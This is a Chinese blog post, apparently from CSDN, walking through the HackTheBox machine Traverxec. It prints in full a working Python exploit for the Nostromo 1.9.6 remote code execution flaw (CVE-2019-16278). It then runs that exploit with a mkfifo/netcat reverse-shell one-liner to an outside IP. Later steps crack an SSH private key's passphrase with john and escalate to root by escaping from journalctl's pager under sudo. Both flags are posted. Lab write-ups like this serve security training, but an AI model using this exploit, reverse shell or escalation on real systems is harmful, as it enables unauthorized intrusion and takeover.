[Meachines] [Easy] Traverxec Nostromo RCE+SSH-私钥RSA解密+journalctl权限提升

于 2024-08-08 22:06:59 发布
阅读量364 收藏 7
点赞数 2
分类专栏: HackTheBox 文章标签: ssh 网络 运维
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/141037336
版权

信息收集

IP AddressOpening Ports
10.10.10.165TCP:22,80

$ nmap -p- 10.10.10.165 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION                                                                                                                                                                                                                
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)                                                                                                                                                                         
| ssh-hostkey:                                                                                                                                                                                                                              
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)                                                                                                                                                                              
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)                                                                                                                                                                             
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)                                                                                                                                                                           
80/tcp open  http    nostromo 1.9.6                                                                                                                                                                                                         
|_http-server-header: nostromo 1.9.6                                                                                                                                                                                                        
|_http-title: TRAVERXEC                                                                                                                                                                                                                     
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nostromo RCE

image.png

$ whatweb 10.10.10.165 -v

$ searchsploit nostromo

image-1.png

https://www.exploit-db.com/exploits/47837

#!/usr/bin/env python
import sys
import socket

art = """

                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/    



"""

help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'

def connect(soc):
    response = ""
    try:
        while True:
            connection = soc.recv(1024)
            if len(connection) == 0:
                break
            response += connection.decode('utf-8')
    except:
        pass
    return response

def cve(target, port, cmd):
    soc = socket.socket() 
    soc.connect((target, int(port)))
    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
    soc.send(payload.encode('utf-8'))
    receive = connect(soc)
    print(receive)

if __name__ == "__main__":

    print(art)
    
    try:
        target = sys.argv[1]
        port = sys.argv[2]
        cmd = sys.argv[3]

        cve(target, port, cmd)
   
    except IndexError:
        print(help_menu)

$ python2 cve2019_16278.py 10.10.10.165 80 id

image-2.png

$ python2 cve2019_16278.py 10.10.10.165 80 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.24 10032 >/tmp/f'

image-3.png

www-data to david

$ ls -al /home/david/public_www/protected-file-area

image-4.png

$ base64 /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz

$ echo 
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' |base64 -d backup-ssh-identity-files.tgz

$ tar -zxvf backup-ssh-identity-files.tgz

$ cat home/david/.ssh/id_rsa

image-5.png

$ openssl rsa -in home/david/.ssh/id_rsa

image-6.png

$ ssh2john home/david/.ssh/id_rsa > hash

$ john --wordlist=/usr/share/wordlists/rockyou.txt hash

image-7.png

key:hunter

$ openssl rsas -in home/david/.ssh/id_rsa -out id_rsa

$ chmod 600 id_rsa

$ ssh -i id_rsa david@10.10.10.165

image-8.png

User.txt

c4830294ae2b76864b388d4e54452bf1

权限提升

image-9.png

$ cat /home/david/bin/server-stats.sh

image-10.png

这段脚本通过 journalctl 返回 nostromo 服务日志的最后 5 行。这个脚本存在漏洞,因为 journalctl 会调用默认的分页程序,而这个分页程序很可能是 less。less 命令会将输出显示在用户屏幕上,并在内容显示后等待用户输入。这可以被利用,通过在 less 命令中运行一个 shell 命令。

$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

途中没有出现输入密码,说明david是在/etc/sudoers文件中是免密执行

!/bin/bash

image-11.png

Root.txt

57ac9d01c8cbff939204951632535154

Мартин.
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox - Traverxec (考点:nostromo安全 & ssh2john & journalctl提权)
冬萍子癸水
05-21 400
1 扫描 22想到可能有ssh登录,80进web信息搜集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) | ssh-hostkey: | 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA) | 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:8
【Vulfocus解题复现】nostromo 远程命令执行 (CVE-2019-16278)
温氏效应
11-23 4981
Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。
(环境搭建+复现)CVE-2019-16278 Nostromo Web服务器的远程命令执行
daxi0ng的博客
03-13 1704
【CNVD编号】 CVE-2019-16278 【漏洞名称】 Nostromo Web服务器的远程命令执行 1【靶标分类】 web中间件漏洞 2【漏洞分类】 命令执行 3【漏洞等级】 高 4【漏洞简介】 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的...
漏洞复现----2、Nostromo Web服务器远程命令执行(CVE-2019-16278)
七天
12-02 2212
文章目录一、漏洞背景二、漏洞原理三、漏洞复现 一、漏洞背景 Nostromo web(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等。 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。 在CVE-2011-0751中攻击者可以通过/..%2f..%2f..%2fbin/sh来实现路径穿越,而
Nostromo 远程命令执行(CVE-2019-16278)复现
小小猪的博客
12-25 784
Nostromo 远程命令执行(CVE-2019-16278)复现 框架介绍: Nostromo web server(nhttpd)是一个开源的web服务器,在Unix系统非常流行。 影响版本: nhttpd:version <= 1.9.6 环境搭建: 这里采用在线环境 地址 漏洞复现: 访问首页 burp抓包,构造注入命令 POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0 Host: vulfocus.fofa.so:34
nostromo 远程命令执行 (CVE-2019-16278)漏洞复现
weixin_42675091的博客
09-23 1014
nostromo 远程命令执行 (CVE-2019-16278)漏洞复现
Nostromo Web服务器的远程命令执行 CVE-2019-16278 已亲自复现
qq_42430287的博客
12-19 604
Nostromo Web服务器的远程命令执行 CVE-2019-16278 已亲自复现
CVE-2019-16278:Nostromo Web服务器的远程命令执行
NOSEC2019的博客
10-22 2612
在这篇文章中,我将分析CVE-2019-16278漏洞的成因,以及如何去利用它。这个漏洞存在于Nostromo web服务上(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等等。 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/...
Vulfocus练习之Nostromo nhttpd远程命令执行(CVE-2019-16278)
weixin_45701865的博客
12-12 840
nostromo远程命令执行(CVE-2019-16278)
Traverxec黑白翻译+笔记版本.pdf
02-17
例如,在本次渗透测试中,发现`journalctl`可被用来提升权限。 - **LOLBAS**:类似GTFOBins的工具,但专注于Windows环境。虽然在本次测试中没有用到,但在针对Windows系统的渗透测试时非常有用。 - **Metasploit**:...
jnostromo:Razer Nostromo 电子竞技驱动程序-开源
06-29
jnostromo 包括一个易于使用的配置 gui,可将键从 nostromo 映射到键盘和/或鼠标。 配置 gui 可以隐藏,并且可以随时通过单击系统托盘图标显示 gui。 该项目的目标是让 jnostromo 成为电子竞技和竞技游戏玩家的首选...
Linux Nostromo Speedpad Driver-开源
04-28
通过配置GUI,可以比简单的USB键盘设备访问Belkin Nostromo n50 / n52速度板。 还包括一个基本的userland linux事件接口以及用于视频和音频的OpenGL和OpenAL模块。
nostromo-cli:Nostromo CLI
05-25
./nostromo 您应该看到可用命令的列表。 在第一个版本中,我们提供了用于管理卡片和项目的简单命令。 第2步-设置API令牌 下一步是填写您的个​​人API令牌。 您可以在用户设置页面中找到此令牌。 之后, .env文件的...
Nostromo N50 on Vista,Seven, XP 32&64 !-开源
06-27
在 VISTA、7 和 XP 32/64 上使用 Belkin Nostromo N50 Speedpad。 无需安装驱动,插上设备即可使用! 支持正常/红色/绿色/蓝色程序级别! 在“文件”部分下载与您的操作系统匹配的文件。 GPLv3(源代码)
【随笔】VRRP+MSTP
weixin_41997073的博客
08-06 324
VRRP 使用选择策略从路由器组中选出一台作为主控,负责 ARP 响应和 IP 数据包转发,组中的其他路由器作为备份的角色处于待命状态。当主控空路由发生故障时,备份路由器能在几秒的时间延后升级的主路由器。一个VRRP组中只能由一台处于主控角色的路由器,可以有一个或多个备份角色的路由器。开销值越低,表示该链路的传输速度越快,路由器会优先选择这些链路进行数据传输。抢占模式的意义, 当 R1 路由器中断又恢复后,则恢复 R1 的主导地位。设计采用主备模式,将VRRP组内多个路由设备都映射为一个虚拟路由设备。
SSH 和 Telnet 之间的区别
ITmoster的博客
08-08 221
SSH 和 Telnet是帮助用户与远程系统建立连接的两种通信协议,这些通信协议决定了数据如何在网络上的不同设备之间传输,这些设备通常需要通过各种物理和数字环境进行传输,网络协议的主要目标是通信、网络管理和安全。
网络药理学:autodock tool(mgltools)实现大分子蛋白(PDB ID已知)和小分子配体的分子快速实践流程总结
最新发布
zhiaidaidai的博客
08-08 119
这里是快速实践的流程总结版(正文步骤都需要在中进行)。pocasaPDB。
【haproxy】haproxy基本配置信息
m0_64570996的博客
08-08 920
就是通过发布三层的IP地址(MIP),然后加四层的端口号,来决定哪些流量需要做负载均衡,对需要处理的流量进行NAT处理,转发至后台服务器,并记录下这个TCP或者UDP的流量是由哪台服务器处理的,后续这个连接的所有流量都同样转发到同一台服务器处理。所谓的四到七层负载均衡,就是在对后台的服务器进行负载均衡时,依据四层的信息或七层的信息来决定怎么样转发流量。Webserver1---172.25.254.10--下载ngnix!Webserver2---172.25.254.20--下载ngnix!
如何提前预防网络威胁
dexun123的博客
08-06 718
这场攻击规模空前,据官方数据,受影响的服务器数量飙升至3800余台,波及范围广泛,尤以美、加、法、德等国的企业为重灾区。态势感知,作为一种根植于环境、动态且全局性的安全风险洞察能力,其核心在于运用安全大数据的浩瀚资源,从宏观视角深化对安全威胁的发现、理解、分析及响应能力,最终引领至精准的安全决策与行动。态势感知强调对网络安全态势的全方位、实时、动态监控与评估,旨在于攻击链条的每一个细微环节捕捉异常,无论是情报搜集的微妙动作,还是攻击尝试的初步试探,乃至数据窃取与情报回传的隐蔽行动,都难逃其敏锐的“法眼”。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值